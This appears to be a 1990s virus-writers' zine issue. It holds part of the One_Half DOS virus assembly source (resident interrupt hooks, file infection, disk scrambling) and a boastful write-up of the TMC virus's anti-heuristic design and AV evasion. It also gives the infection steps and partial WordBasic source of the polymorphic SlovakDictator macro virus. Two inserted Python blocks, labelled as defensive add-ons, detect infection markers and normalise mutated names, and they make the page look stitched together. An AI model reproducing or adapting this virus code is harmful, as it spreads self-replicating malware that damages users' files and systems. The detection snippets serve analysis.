POCKRP=6 ;number of critical programsretaz DB 4, '.COM' , 4, '.EXE'retaz1 DB 4, 'SCAN' , 5, 'CLEAN' , 8, 'FINDVIRU' , 5, 'GUARD' , 3, 'EMM'retaz2 DB 6, 'CHKDSK'

Over PROC nearpush dxpush bxpush cxpush sipush dipush dspush espush axmov si , dxmov di , OFFSET canamepush cspop eslea bx ,[ di - 1]mov cx , DLZFNB

ol1 : lodsbcmp al , 'a'jb nmpcmp al , 'z'ja nmpsub al , 'a' - 'A' ;uppercase

nmp: push axpush si

nzero : cmp al , ' 'jne nomdzlodsbor al , aljnz nzero ;no ending spacespop sipop sijmp short nstfn

nomdz: pop sipop axcmp al , '\'je stfn


cmp al , '/'je stfncmp al , ':'jne nstfn

stfn : mov bx , dinstfn : stosb

or al , aljz whnameloop ol1

whname: mov si , OFFSET retazsub di , 5push cspop ds

call Porovnajje porokcall Porovnajjne oinok ;is it COM or EXE ?

porok : pop axpush axxchg di , bxinc dicmp ax , 4b00hjne nnchkmov si , OFFSET retaz2call Porovnajjne nnchk ;is it CHKDSK ?mov byte ptr ds :( OFFSET dtrad +1), OFFSET dnxt - OFFSET con1

nnchk : mov cx , POCKRPmov si , OFFSET retaz1

ol2 : push cxcall Porovnajpop cxje oinokloop ol2 ;check for critical programs

mov si , OFFSET canamexor bl , bllodswcmp ah, ':'jne imdrvsub al , 'A' - 1mov bl , al

imdrv : mov ax , 4408hcall Int21or ax , ax

vsetky : jz oiok ;removable (floppy like)mov ax , 4409hcall Int21jc oinoktest dh, 10hjnz oiok ;in network

oinok : stcokon : pop ax

pop espop dspop dipop sipop cxpop bx


pop dxret

oiok : ; mov ax,0e07h; int 10h

clcjmp okon

Over ENDPPorovnaj PROC near

push dilodsbmov cl , almov ax , siadd ax , cxrepe cmpsbmov si , axpop diret

Porovnaj ENDP

Identify PROC near ;is file inf. ?push dxmov ax , es :[ bx +2]xor dx , dxdiv cs : v30mov ax , es :[ bx ]and al , 11111bcmp al , dlstcje iekon ;already infectedmov ax , es :[ bx ]and ax , 0ffe0hor al , dlclc

iekon : pop dxret

Identify ENDP

Subdlz PROC nearsub word ptr es :[ bx ], DLZVIRsbb word ptr es :[ bx +2], 0jnc npretadd word ptr es :[ bx ], DLZVIRadc word ptr es :[ bx +2], 0

npret : retSubdlz ENDP;************** TSR 21h part *************Infname PROC near ;DS:DX = file name

push axpush bxpush cxpush sipush dipush bppush dspush escall Nastav24mov ax , 4300hcall Int21mov cs : attrib , cxmov ax , 4301hxor cx , cxcall Int21


jc err1mov ax , 3d02hcall Int21jc err2push dxpush dspush cspop dspush cspop esmov handle , axcall Infikujmov ah, 3ehcall Mhandlepop dspop dx

err2 : mov ax , 4301hDB 0b9h

attrib DW ? ;mov cx,attribcall Int21

err1 : call Vrat24pop espop dspop bppop dipop sipop cxpop bxpop axret

Infname ENDP

res21 : pushfsticmp ah, 11hje dtradcmp ah, 12hjne dnxt

dtrad : jmp short con1 ;switched jump conditioncon1 : push bx

push espush axmov ah, 2fhcall Int21pop axcall Int21cmp al , 0ffhje dterrpush axcmp byte ptr es :[ bx ], 0ffhjne nrozsadd bx , 7

nrozs : add bx , 17hcall Identifypop axjnc dterradd bx , 1dh - 17hcall Subdlz

dterr : pop espop bxpopfiret


dnxt : cmp ah, 4ehje drozscmp ah, 4fhjne ndnxt

drozs : push bxpush espush axmov ah, 2fhcall Int21pop axcall Int21jc drozepush axadd bx , 16hcall Identifypop axjnc drozneadd bx , 1ah - 16hcall Subdlz

drozne : pop espop bxpopfclcretf 2

droze : pop espop bxpopfstcretf 2

ndnxt : cmp ax , 4b53hjne obrnxtmov ax , 454bhpopfiret

obrnxt : cmp ah, 4chjne nkprgmov byte ptr cs :( OFFSET dtrad +1), 0

nkprg : cldpush dxcmp ax , 4b00h

jne nsppgcon3 : jmp short miimmiim : push ax

push bxpush dspush esmov ah, 52hcall Int21mov ax , es :[ bx - 02h ]

nmcb: mov ds , axadd ax , ds : 03hinc axcmp byte ptr ds : 00h , 'Z'jne nmcbmov bx , cscmp ax , bxjne cpchmov byte ptr ds : 00h , 'M'xor ax , axmov ds , axadd word ptr ds : 0413h , POCKIL ;memory look improvement

cpch : mov byte ptr cs :( OFFSET con3 +1), OFFSET aiim - OFFSET miim


pop espop dspop bxpop ax

aiim : jmp short infacnsppg : cmp ah, 3dh

je infac; cmp ah,43h; je infac

cmp ah, 56hje infaccmp ax , 6c00hjne nxtstest dl , 00010010bmov dx , sijz infacjmp short saveh

nxts : cmp ah, 3chje savehcmp ah, 5bhje savehcmp ah, 3ehjne jor21cmp bx , cs : chandlejne jor21or bx , bxjz jor21call Int21jc miretspush dspush cspop dsmov dx , OFFSET fnamecall Infnamemov chandle , 0pop ds

miretc : pop dxpopfclcretf 2

jor21 : pop dxpopfjmp cs : oriv21

infac : call Overjc jor21call Infnamejmp short jor21

saveh : cmp cs : chandle , 0jne jor21call Overjc jor21mov cs : rhdx , dxpop dxpush dxcall Int21db 0bah

rhdx DW ? ;mov dx,rhdxjnc shok

mirets : pop dxpopf


stcretf 2

shok : push cxpush sipush dipush esxchg si , dxmov di , OFFSET chandlepush cspop esstoswmov cx , DLZFNBrep movsbpop espop dipop sipop cxjmp short miretc

DB 'DidYouLeaveTheRoom?'order DW 1230 ;very important year :)endvir LABEL near

Zakoduj PROC nearmov cx , DLZVIRxor dx , dx ;OFFSET stvircall zp1mov ah, 40hmov bx , handlepushfDB 9ah ;call oriv21

oriv21 DD ?jc zk1cmp ax , cx

zk1 : pushfcall zp1popfret

zp1 : push cxmov si , dx

zkmax: mov ax , 0000hmov cx , DLZVIR

zp2 : xor [ si ], axzkaax : add ax , 0000h

inc siloop zp2pop cxret

Zakoduj ENDP

res24 : mov al , 03hiret

Int13 PROC nearpushfcall cs : oriv13ret

Int13 ENDPTosi PROC near

push cxpush dxshr cl , 1


shr cl , 1and dh, 11000000bor dh, clmov cl , 4shr dh, clmov dl , chxchg si , dxpop dxpop cxret

Tosi ENDPSkramb PROC near

push axpush bxpush cxDB 0b0h ;mov al,kolzak

kolzak DB ?DB 0b8h ;mov bx,odkzak

odkzak DW ?nxtss : mov cx , 256ls1 : xor word ptr es :[ bx ], 1212h

inc bxinc bxloop ls1dec aljnz nxtsspop cxpop bxpop axret

Skramb ENDPres13 : cmp ah, 02h

je rtccmp ah, 03hje rtcjmp jtoo

rtc : cmp dx , 0080hjne encodetest cx , 0ffc0hjnz encodepush bxpush dxpush sipush dipush cxpush cxmov si , axand si , 00ffhmov di , simov al , 01hpush axjz bzch ;if AL=0 do nothingjcxz gchicmp cl , 01hje obbs

nxtsc : cmp cl , 17 ;if sector number > max. then errorja gchi

r13ds : cmp cl , 07hjb ctoocmp ah, 03hje gchipush bx


mov cx , 512flbf : mov byte ptr es :[ bx ], 00h

inc bxloop flbfpop bx

rtcom : add bx , 512pop axpop cxinc cxpush cxpush axdec sijnz nxtsc

bzch : clczav : pop ax

pushfxchg ax , disub ax , sipopfmov ah, chpop cxpop cxpop dipop sipop dxpop bxretf 2

obbs : mov cl ,byte ptr cs :( OFFSET r13ds +2)ctoo : call Int13

mov ch , ahjc zavjmp rtcom

gchi : stcmov ch , 0bbh ;undefined errorjmp zav

encode : cmp dl , 80h ;encoding resp. decodingjne jtoopush axpush cxpush dxpush sipush dspush cspop dsmov kolzak , 0mov odkzak , bxcall Tosiand cl , 3fhand dh, 3fh

chdnd : or al , aljz htvocmp si , 1234h ;max. cyl.jae htvo

cnflte : cmp si , 1234h ;min. cyl.jb tdalinc kolzakjmp short nxslp

tdal : add odkzak , 512nxslp : dec al

inc clDB 80h , 0f9h ,?


jbe chdndmov cl , 1inc dhDB 80h , 0feh ,?jbe chdndxor dh, dhinc sijmp chdnd

htvo : cmp kolzak , 0pop dspop sipop dxpop cxpop axje jtoocmp ah, 02hje eckncall Skramb

eckn : call zInt13pushfcall Skrambpopfretf 2

jtoo : DB 0eahoriv13 DD ?

handle DW ?header strc <>off24 DW ?seg24 DW ?ftime DW ?fdate DW ?chandle DW ?fname DB DLZFNB DUP(?)ibuf LABEL byte ;variables for mutationcaname DB DLZFNB DUP( 1)

endres LABEL nearVkod ENDS

END start


For some 4 or 5 months it has been known that a new kind of virus has been released. The first rumorz talked 'bout a virus that screws all the heuristics. And, we've to say, it was pure fact, no advertising shit.

From a technical point of view, TMC is a resident com'n'exe infector. Infection occurs on execution, opening, renaming and copying of suitable files. This 'll affect COMs under 57 kB and EXEs under 384 kB. Files whose name starts with 'ic', 'no', 'we', 'tb', 'av', 'sc', 'co', 'wi' or 'kr' are not infected. These strings cover a huge spectrum of anti-viruses: not only the best Slovak antivirus program NOD-ICE, but also other good AV tools. So TMC has a quite good chance to survive the most important first months in the wild. TMC sets the seconds in the timestamp to the 'magic' value 8. The virus contains the texts:

TMC 1.0 by Ender from Slovakia
Welcome to the Tiny Mutation Compiler!
Dis is level 42.
Greetings to virus makers: Dark Avenger, Vyvojar, Hell Angel
Personal greetings: K. K., Dark Punisher
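Both infection markers described in this issue live in the file's DOS timestamp: One_Half's Identify routine (in the listing above) compares the low five bits of the time word with the date word modulo the divisor v30, and TMC sets the seconds to 8. The checker below is an added triage example written for this page, not code from the zine or from either virus author. It assumes that v30 holds the value 30 and that the DOS time field stores seconds/2 (so "seconds = 8" is a raw field value of 4); the directory entries it scans are constructed.

```python
# Added triage example for this page (not the zine's or either virus author's code).
# DOS directory timestamps: time word = hhhhh mmmmmm sssss (sssss = seconds/2),
# date word = yyyyyyy mmmm ddddd (year relative to 1980).

ONE_HALF_MODULUS = 30   # assumption: One_Half's divisor v30 holds the value 30
TMC_SECONDS = 8         # "TMC sets second in timestamp to 'magic' value 8"


def make_time(hours, minutes, seconds):
    return (hours << 11) | (minutes << 5) | (seconds // 2)


def make_date(year, month, day):
    return ((year - 1980) << 9) | (month << 5) | day


def split_time(time_word):
    """Return (hours, minutes, seconds) from a DOS time word."""
    return (time_word >> 11) & 0x1F, (time_word >> 5) & 0x3F, (time_word & 0x1F) * 2


def one_half_marked(time_word, date_word, modulus=ONE_HALF_MODULUS):
    """Mirror of the Identify routine: AX = date word, DX:AX / v30 leaves the
    remainder in DL; AL = time word AND 11111b; equal means 'already infected'."""
    return (time_word & 0x1F) == (date_word % modulus)


def tmc_marked(time_word):
    """A seconds value of 8 is a raw field value of 4 (the field stores seconds/2)."""
    return (time_word & 0x1F) == TMC_SECONDS // 2


def scan(entries):
    """entries: iterable of (name, time_word, date_word). Returns (name, tags) hits."""
    hits = []
    for name, time_word, date_word in entries:
        tags = []
        if one_half_marked(time_word, date_word):
            tags.append("One_Half")
        if tmc_marked(time_word):
            tags.append("TMC")
        if tags:
            hits.append((name, tags))
    return hits


# Constructed directory entries (not real samples).
SAMPLE_ENTRIES = [
    ("CLEAN.COM",   make_time(12, 0, 0),  make_date(1997, 3, 1)),
    ("SUSPECT.EXE", make_time(12, 0, 22), make_date(1997, 3, 1)),   # 22/2 == 8801 % 30
    ("OTHER.COM",   make_time(9, 30, 8),  make_date(1996, 12, 24)), # seconds == 8
]

if __name__ == "__main__":
    for name, tags in scan(SAMPLE_ENTRIES):
        print(name, "->", ", ".join(tags))
```

Both markers collide with clean files at roughly 1 in 30 (One_Half) and 1 in 32 (TMC), and the Infikuj routine above deliberately leaves about 1 in 30 infected files unmarked, so a hit is a reason to look at the file's code, not a verdict on its own.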

And you may now ask: "And what makes TMC so extraordinary?" Okay, let's go to the void main().

#define FALSE 0
#define TRUE 1
#define NOT_TRIVIAL 0.5
#define INFECTED_FILE_CONTAIN_BODY_OF_VIRUS FALSE

/* The body of the virus contains just some kind of compiler, which compiles the virus from encrypted source pseudocode into memory. Because the compilation doesn't use any structure that is heuristic-sensitive, there is no heuristic alert here :) [Simple and clever] The compiler is also capable of inserting garbage jump instructions into the virus copy in memory. So again, no simple scanstring in memory here. Just one little thingy here is not perfect. These jumps 'll not have a known size, so the compiler puts in some extra NOPs. The virus is like an asm proggy compiled under TASM without the /m switch. */


#define ANTIHEURISTIC_CODE TRUE

/* TMC contains some kind of anti-cleaning trap, so it is not easy to remove from an infected file. Well, another life insurance */

#define EXTRA_STUFF TRUE

/* TMC has different features in different generations. Just check it out */

#define DETECTION_AND_REMOVAL NOT_TRIVIAL

/* As far as I know, only two antivirus programs detect TMC - Dr.Web and NOD-ICE. As an extra bonus, NOD is capable of removing TMC. Some dudes from the AV side seem to be really good at their work :( */

Ender, the promising author of this virus, has chosen his nick from 'Ender's Game' by Orson Scott Card. The strings "Welcome to the Tiny Mutation Compiler!" and "Diz is level 42" are, according to the author, related to Level3 by Vyvojar.

Due to some kind of agreement between our mag and Ender, we were not allowed to publish the full sources of this excellent virus. As Ender stated, the sources 'll be released only after all the major anti-virus vendors 'll detect and remove the virus. "They should have their work hard... they're paid for it, but we are not ...". So dear friend, we present you at least a sample of this virus. But we have the source prepared for public release asap TMC 'll be removed by TBAV, SCAN, AVP, DRWEB, S&S, ALWIL! and others from Virus Bulletin.

Howgh !


WordMacro.SlovakDictator

The world's first true polymorphic macro virus infecting Word 7.x documents. The virus of the next generation.

This description brought to you by Nasty Lamer & Ugly Luser exclusively for the *-zine. (c) 1-mar-1997, Slovakia

This article describes how this macro virus works, what its advantages are in comparison with other existing Word 6.0 and 7.0 macro viruses, its disadvantages, and finally the plans of the authors of this virus for the near future. The source code (2nd generation) is shown at the end of this article. The macro generator (Lamer's Macro Engine) itself is intentionally not presented.

Introduction

Macro viruses for Word 6.0 and above infect Micro$oft Word documents and templates. The first macro virus for Word was written in the fall of 1994. At present there are over 500 known macro viruses and their number grows rapidly every day. But many of them are very similar to each other and do not offer anything new to virus writing technology. They use almost the same infection techniques and their bodies are the same in each copy of the virus. Many of them are very lame and primitive. Authors of macro viruses very often take whole parts from other macro viruses into their macro, modify them a little bit and release them as new viruses. But almost all known macro viruses have the same binary image of the macro body in each copy (so-called static macros). This feature greatly simplifies the work of antivirus companies. They can detect these macros very exactly, with high accuracy, by using the CRC method. They are able to add detection for several hundred macro viruses a day by using programs for the automatic generation of CRCs for macro bodies. Current macro virus writers are not too inventive and it looks like only lamers write macro viruses. Do not forget that macro virus writing is not for real virus writers, as they prefer writing in assembler.

The first breakthrough in macro virus writing technology was caused by the Outlaw virus. It was the first semi-polymorphic virus. Why semi-polymorphic? Because only the macro names were different in each copy of the virus, while its body remained static (some antiviruses used to detect viruses by their names). However, for people interested in the antivirus industry it was a nice opportunity to flood various magazines with detailed descriptions of this "new technology" in macro virus writing.

After a long time the macro virus writers have discovered that Micro$oft Word Basic gives a possibility for macro editing and for creating polymorphic macro viruses. In the present these


possibilities are not used very often. There exist only a few viruses which modify something in their source code and make each generation a little bit different. Their most often used method is simply inserting one or several dummy lines into the source code or changing the names of some variables. No true polymorphic virus was known until WordMacro.SlovakDictator appeared.

Behind the macro virus detection techniques

Antivirus programs use different techniques to detect macro viruses. From the point of view of the techniques used, we can arrange them into the following categories:

1. The method based on looking for "virus strings"

Because a big part of the macros consists of text, the strings must be long enough to avoid possible false alarms. The frequently used and also reasonable size for these strings is between 24 and 32 bytes. The advantage of this method is that by using one search string it can detect several variants of a big family of viruses. In most cases this method can not detect viruses exactly.

2. Method based on computing CRCs

This is the only method which is able to detect all static macro viruses exactly. The big disadvantage of this method is that it fails in those cases where someone adds, for example, a tabulator mark after the end of the macro :). At present most antivirus programs use this method.

3. Method based on heuristic analysis of the macros

This is a good method for detecting new and even unknown macro viruses.

4. Other methods

They use a combination of several methods mentioned above or some new techniques.

Description of the WordMacro.SlovakDictator macro virus

This virus is the first real attempt to write a macro virus undetectable by "search strings". It also fucks all scanners based on computing CRCs, because it has almost unlimited mutation capability. We decided to write this virus to illustrate some techniques which MacroFuck Corporation and their Macro$Soft Word offer to macro virus writers. The virus contains only one unencrypted viral macro, AutoClose, and its size is from 14 kB to 16 kB (the size for variant B may exceed 16 kB). All names of variables, procedures, functions and constants are fully mutated, and for this reason the final size of the macro is different for each copy of the virus. The macro does not use any command for copying macros (MacroCopy or Organizer) for replicating. It uses only commands for creating and editing macros. Due to this feature it is not yet detectable by known virus scanners, not even by the heuristic scanners. The detection of this virus will probably cause problems for antivirus programs which use "search strings" for macro detection. The whole macro is divided into three parts. In the first part all global variables, arrays and constants are declared. The second part performs a check for the version of Word and contains all procedures and functions needed for creating the macro and its execution. The third and final part contains two tables. In the first table is stored the whole macro body (its


source lines) in an encrypted form. The source lines in this table do not contain the two tables mentioned above because they are already present in the third part of the macro.

The actions of the macro virus are performed in several steps:

1. It checks whether the Micro$oft Word in use is version 7.x. If yes, the further steps are performed, otherwise the macro finishes.

2. It decrypts the first table in the third part of the macro. The chosen encryption method is very trivial. Each byte is decrypted with a constant which may have values from 4 to 13 (try to guess why?). This value is added to (or subtracted from) each character in the strings that belong to the first table in the third part of the macro.

3. It creates a temporary macro with a random name and inserts the decrypted source lines of the macro (the first two parts of the macro) into it.

4. It replaces all occurrences of the string "@@" with the quote character ("). The characters @@ are used to mark all places that have to be replaced with a quote.

5. It inserts both tables at the end of this macro: the table with decrypted source lines and the table with polymorphic names of variables, procedures, functions and constants.

6. It calls the procedure which mutates all names stored in the table of polymorphic names. These names are from 10 to 19 characters long.

7. It runs this temporary macro. When the macro is executed it first checks whether it has to infect the global template or the document. If the global template or the closing document already contains a macro named AutoClose, nothing is done. Otherwise the macro creates a macro AutoClose in the global template or document and executes actions similar to those described in the previous paragraphs.

The macro contains a special payload. On each 4th and 11th of the month it displays a message box with a special warning that you are infected by the WordMacro.SlovakDictator virus.

8. It deletes the temporary macro, enables screen updating, enables interrupting a macro by pressing the ESC key and finishes.
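The decryption in step 2 and the name mutation in step 6 are what defeat the search-string and CRC methods listed earlier, and they also show what a scanner can do instead. The script below is an added analysis example written for this article, not the authors' code: it recovers the shift constant of an encrypted table by trying the 4 to 13 range stated above and scoring for WordBasic keywords, then hashes the macro text after replacing every identifier that matches the article's mutated-name pattern (assumed here to be 10 to 19 uppercase letters, per step 6) so that two generations with different random names hash the same. The encrypted input is taken from the generation-2 table at the end of this article; the "next generation" renaming is constructed.

```python
import re
import zlib

# Five lines copied from the encrypted table in SLDICT_A.SRC on this page.
# Under shift 6 they decode to "Dim Shared ...", "Sub MAIN", "On Error Goto ...", "End Sub".
ENCRYPTED_SAMPLE = [
    "Jos&Yngxkj&PURYXM\\GP\\G\\VIWYLY",
    "Jos&Yngxkj&XYZYJZWGHILXOSKJY",
    "Y{h&SGOT",
    "Ut&Kxxux&Muzu&HIRNWHR[LUMIU",
    "Ktj&Y{h",
]

# WordBasic tokens that a correctly decoded table must contain.
KEYWORDS = ("Dim Shared", "Sub ", "End Sub", "Goto", "End If")

# Mutated names per the article: 10 to 19 characters (assumed uppercase letters only).
MUTATED_NAME = re.compile(r"\b[A-Z]{10,19}\b")


def shift_line(line, k):
    """Subtract the constant k from every character (undoes the virus's step 2)."""
    return "".join(chr((ord(c) - k) % 256) for c in line)


def keyword_score(text):
    return sum(text.count(kw) for kw in KEYWORDS)


def recover_shift(enc_lines, candidates=range(4, 14)):
    """Try every constant in the article's 4..13 range and keep the one that
    yields the most WordBasic keywords. Returns (shift, decoded_lines)."""
    decoded = {k: [shift_line(l, k) for l in enc_lines] for k in candidates}
    best = max(candidates, key=lambda k: keyword_score("\n".join(decoded[k])))
    if keyword_score("\n".join(decoded[best])) == 0:
        raise ValueError("no candidate shift produced WordBasic text")
    return best, decoded[best]


def normalize(lines):
    """Replace every mutated identifier with a fixed token so the hash no
    longer depends on the per-generation random names."""
    return "\n".join(MUTATED_NAME.sub("ID", l) for l in lines)


def raw_crc(lines):
    """CRC32 of the body as an AV product computing a plain CRC would see it."""
    return zlib.crc32("\n".join(lines).encode("latin-1"))


def normalized_crc(lines):
    """CRC32 of the body with mutated names canonicalised."""
    return zlib.crc32(normalize(lines).encode("latin-1"))


def rename_generation(lines, mapping):
    """Constructed stand-in for step 6: same code, fresh mutated names."""
    out = []
    for line in lines:
        for old, new in mapping.items():
            line = line.replace(old, new)
        out.append(line)
    return out


# Constructed replacement names for a hypothetical next generation.
NEXT_GEN_NAMES = {
    "JOLSRGVAJVAVPCQSFS": "QWERTYUIOPASDFGHJK",
    "RSTSDTQABCFRIMEDS": "ZXCVBNMLKJHGFDSA",
    "BCLHQBLUFOGCO": "HORSEBATTERY",
}

if __name__ == "__main__":
    shift, gen2 = recover_shift(ENCRYPTED_SAMPLE)
    gen3 = rename_generation(gen2, NEXT_GEN_NAMES)
    print("shift constant:", shift)
    print("raw CRC32 differs between generations:", raw_crc(gen2) != raw_crc(gen3))
    print("normalized CRC32 equal between generations:", normalized_crc(gen2) == normalized_crc(gen3))
```

The keyword scoring is deliberately simple: any shift other than the right one turns "Dim Shared" into non-words, so a handful of WordBasic tokens is enough to pick it out. Canonicalising identifiers before hashing is the defender's answer to the "almost unlimited mutation capability" claimed above; it does not help against viruses that also reorder or rewrite statements, which is why heuristic analysis of what the macro does (creating and editing macros, replacing "@@" with quotes) remains the more robust signal.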


Advantages of the virus:

- The virus brings new technology to macro virus writing :)
- It is the first Slovak macro virus :)
- It is the world's first true polymorphic virus :)
- Its source lines are internally encrypted by a different encryption constant :)
- It will be hard to detect it by "search strings", because it does not contain any typical virus strings. It can not be detected by computing CRC (only lame researchers will do that) :)
- The largest possible string is 15 bytes long, but this string can not be used as a virus string.
- It does not use commands for copying macros :)
- It does not contain an operation suspected by heuristic scanners :)
- Known antivirus programs do not detect it, not even heuristic programs

Disadvantages:

The process of infection is very slow; it may take over 15 seconds on slow PCs (on the tested Pentium 166 MHz it took 15 seconds) :|

Although the virus prevents the ESC key from interrupting the macro, pressing keys while the virus is running may cause a bug in creating mutated names of variables, and for this reason a bug in the executing macro may occur (it will be fixed in the version for Word 8.0) :|

The virus is language dependent: it infects only English versions of Word 7.x documents. Due to its special infection techniques it is not able to infect Word 8.0 documents.

There are two variants of this virus: WordMacro.SlovakDictator.A (described in this article) and WordMacro.SlovakDictator.B. In variant B small changes were made but the basics have remained the same. This variant works similarly to variant A, but it displays the following dialog box:

Our plans for the near future


We would like to show the big potential of Micro$oft Visual Basic to all macro virus writers by rewriting SlovakDictator for Micro$oft Word version 8.0. We hope that the next version written in Visual Basic will be undetectable for a long time. We are also planning to write a fully polymorphic macro virus infecting Micro$oft Excel documents and a multiplatform virus infecting Office documents.

Conclusion

The Lamer's Macro Engine and the source code generator of the described macro virus are not presented because each lamer, even Vesselin B. (well known as fucking pig and shithead), is able to analyze this virus and understand it in 20 minutes. But we are not sure about that with Vesselin B :). We wrote this virus within one day and we hope that the other lame macro virus writers are able to do it too. And finally, we just invented a brand new method of speeding up the internal encryption and decryption, so the next version will be much faster (and maybe it will be permutated !) :)

Big thanks go to MacroFuck Corporation for their famous Virus Development Kit for multiple platforms. Micro$oft Word is a registered trade mark of the MacroFuck Corporation.

Dedicated to:


SLDICT_A.SRC

REM --------- WordMacro.SlovakDictator.AREM --------- source code - 2nd generationREM --------- it is cool, isn't it ?REM --------- do not modify !REM ---------------------------------------Dim Shared JOLSRGVAJVAVPCQSFSDim Shared RSTSDTQABCFRIMEDSDim Shared NNJVBQFICLBTDim Shared CTSBMNQRJVKTUNDim Shared RAQIEGQHTEKGMJPADim Shared BLMVUIODKQIDDim Shared TRFEHFFKDGADim Shared PNFFUDGIOJHJMOJSDim Shared EEMSCNFUSDSADim Shared IMNVDDCUIELPKGOQDim Shared KILNETOHSCNTSGEBDim Shared FDCKUBLQVSMCLCS$(200 )Dim Shared ESBGMDHQMTVDim Shared UKEHLODOGSTCBCFESDim Shared LAOGRDANQUAUGEMDRCDim Shared TISEIKHODQQCGBM$(31)Dim Shared VAHINRNESDMBBCBTNOG

Sub MAINOn Error Goto BCLHQBLUFOGCODisableInput 1JOLSRGVAJVAVPCQSFS =0RSTSDTQABCFRIMEDS =1NNJVBQFICLBT = 2CTSBMNQRJVKTUN =7RAQIEGQHTEKGMJPA =10BLMVUIODKQID = 20TRFEHFFKDGA =22PNFFUDGIOJHJMOJS =65EEMSCNFUSDSA =34IMNVDDCUIELPKGOQ =64ESBGMDHQMTV =38UKEHLODOGSTCBCFES =120LAOGRDANQUAUGEMDRC =179VAHINRNESDMBBCBTNOG =31GPDTGRQFBAB$ = AppInfo$(NNJVBQFICLBT)SBKVJOSUHRSLRIAJTBQ = Val(Left$(GPDTGRQFBAB$, RSTSDTQABCFRIMEDS))If SBKVJOSUHRSLRIAJTBQ <> CTSBMNQRJVKTUNThen Goto BCLHQBLUFOGCOCall FVNIPFORQMUIVScreenUpdating JOLSRGVAJVAVPCQSFSDisableAutoMacros RSTSDTQABCFRIMEDSQRQLVKABPUEJAAJGMF

CUMKMEDQSRG$ = WindowName$()ToolsMacro .Name = "KRTMEMGAIRIIJV" , .Show = RSTSDTQABCFRIMEDS, .EditEditClear - BLMVUIODKQIDFor OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFSTo LAOGRDANQUAUGEMDRC : Insert FDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ) : InsertPara : Next OTSPNBQUVCREARJ

EditReplace .Find = Chr$(IMNVDDCUIELPKGOQ) + Chr$(IMNVDD CUIELPKGOQ), .Replace = Chr$(EEMSCNFUSDSA), .Direction = JOLSRGVAJVAVPCQSFS, .MatchC ase = RSTSDTQABCFRIMEDS, .WholeWord =JOLSRGVAJVAVPCQSFS, .PatternMatch = JOLSRGVAJVAVPCQSFS, .SoundsLike = JOLSRGVAJVAVPCQSFS, .ReplaceAll, .Format = JOLSRGVAJVAVPCQSFS, .Wrap = RSTSDTQ ABCFRIMEDS, .FindAllWordForms =JOLSRGVAJVAVPCQSFS

NBRAOKIBBFOKGI


UFFHOQFGCUDocClose RSTSDTQABCFRIMEDSActivate CUMKMEDQSRG$

Call KRTMEMGAIRIIJVToolsMacro .Name = "KRTMEMGAIRIIJV" , .Show = RSTSDTQABCFRIMEDS, .Delete

BCLHQBLUFOGCO:DisableAutoMacros JOLSRGVAJVAVPCQSFSScreenUpdating RSTSDTQABCFRIMEDSDisableInput JOLSRGVAJVAVPCQSFSEnd Sub

Sub QRQLVKABPUEJAAJGMFFor OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFSTo LAOGRDANQUAUGEMDRCBVEDQHRBEVT$ =""SKPAQDHJGRB = Len(FDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ))For FVVNOICFUVCMSET = RSTSDTQABCFRIMEDSTo SKPAQDHJGRBBVEDQHRBEVT$ = BVEDQHRBEVT$ + Chr$(Asc(Mid$ (FDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ),FVVNOICFUVCMSET, RSTSDTQABCFRIMEDS)) - KILNETOHSCNTSGEB)Next FVVNOICFUVCMSETFDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ) = BVEDQHRBEVT$Next OTSPNBQUVCREARJEnd Sub

Sub NBRAOKIBBFOKGIFor OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFSTo LAOGRDANQUAUGEMDRCInsert "FDCKUBLQVSMCLCS$("+ Str$(OTSPNBQUVCREARJ) + ")=" + Chr$(EEMSCNFUSDSA) +FDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ) + Chr$(EEMSCNFUSDSA)InsertParaNext OTSPNBQUVCREARJFor OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFSTo VAHINRNESDMBBCBTNOG - RSTSDTQABCFRIMEDSInsert "TISEIKHODQQCGBM$(" + Str$(OTSPNBQUVCREARJ) + ")=" + Chr$(EEMSCNFUSDSA) +TISEIKHODQQCGBM$(OTSPNBQUVCREARJ) + Chr$(EEMSCNFUSDSA)InsertParaNext OTSPNBQUVCREARJEnd Sub

Function EJQGEPDKDADFPSQN$BVEDQHRBEVT$ =""For OTSPNBQUVCREARJ = RSTSDTQABCFRIMEDSTo RAQIEGQHTEKGMJPA + Rnd() * RAQIEGQHTEKGMJPA :BVEDQHRBEVT$ = BVEDQHRBEVT$ + Chr$(Rnd() * TRFEHFFKDGA + PNFFUDGIOJHJMOJS) : NextOTSPNBQUVCREARJEJQGEPDKDADFPSQN$ = BVEDQHRBEVT$End Function

Sub UFFHOQFGCUFor OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFSTo VAHINRNESDMBBCBTNOG - RSTSDTQABCFRIMEDSEditReplace .Find = TISEIKHODQQCGBM$(OTSPNBQUVCREARJ), .Replace = EJQGEPDKDADFPSQN$, .Direction = JOLSRGVAJVAVPCQSFS, .MatchCase = RSTSDTQABCF RIMEDS, .WholeWord =JOLSRGVAJVAVPCQSFS, .PatternMatch = JOLSRGVAJVAVPCQSFS, .SoundsLike = JOLSRGVAJVAVPCQSFS, .ReplaceAll, .Format = JOLSRGVAJVAVPCQSFS, .Wrap = RSTSDTQ ABCFRIMEDS, .FindAllWordForms =JOLSRGVAJVAVPCQSFSNext OTSPNBQUVCREARJEnd Sub

Sub FVNIPFORQMUIVKILNETOHSCNTSGEB = 6FDCKUBLQVSMCLCS$(0) = "Jos&Yngxkj&PURYXM\GP\G\VIWYLY"FDCKUBLQVSMCLCS$(1) = "Jos&Yngxkj&XYZYJZWGHILXOSKJY"FDCKUBLQVSMCLCS$(2) = "Jos&Yngxkj&TTP\HWLOIRHZ"FDCKUBLQVSMCLCS$(3) = "Jos&Yngxkj&IZYHSTWXP\QZ[T"


